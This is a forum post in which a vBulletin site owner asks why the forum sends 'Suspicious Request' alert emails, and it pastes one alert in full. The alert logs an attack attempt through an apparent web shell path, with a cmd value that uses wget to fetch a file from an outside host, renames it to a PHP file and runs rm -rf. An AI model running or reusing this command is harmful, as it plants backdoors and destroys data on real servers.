Art Andrews
01-20-2014, 04:49 PM
For the life of me, I can't figure out where these are coming from, but I'd like to know more so I can investigate further. From time to time we get an email like the one below:
Email title:
Suspicious Request
Email body:
Cinput: wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip
Forum: http://www.therpf.com
IP: 176.28.49.238
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Request: /forum.php//images/stories/racrew.php?cmd=wget%20http://www.allegoriaonline.it/images/incs.txt%20;%20mv%20incs.txt%20incs.php%20;%20rm%20-rf%20componentz.zip
User: Unregistered
GET: array (
'cmd' => 'wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip',
)
POST: array (
'ajax' => NULL,
)
COOKIE: array (
'vbulletin_collapse' => NULL,
'bb_referrerid' => NULL,
'bb_userid' => NULL,
'bb_password' => NULL,
'bb_lastvisit' => NULL,
'bb_lastactivity' => NULL,
'bb_threadedmode' => NULL,
'bb_sessionhash' => NULL,
'bb_userstyleid' => NULL,
'bb_languageid' => NULL,
'bb_skipmobilestyle' => NULL,
'bb_forum_view' => NULL,
'vbulletin_sidebar_collapse' => NULL,
)
I have asked my server admin about it and he said nothing on the server side is doing it and that it is being generated through vB. I can't seem to find any info on it. Please help!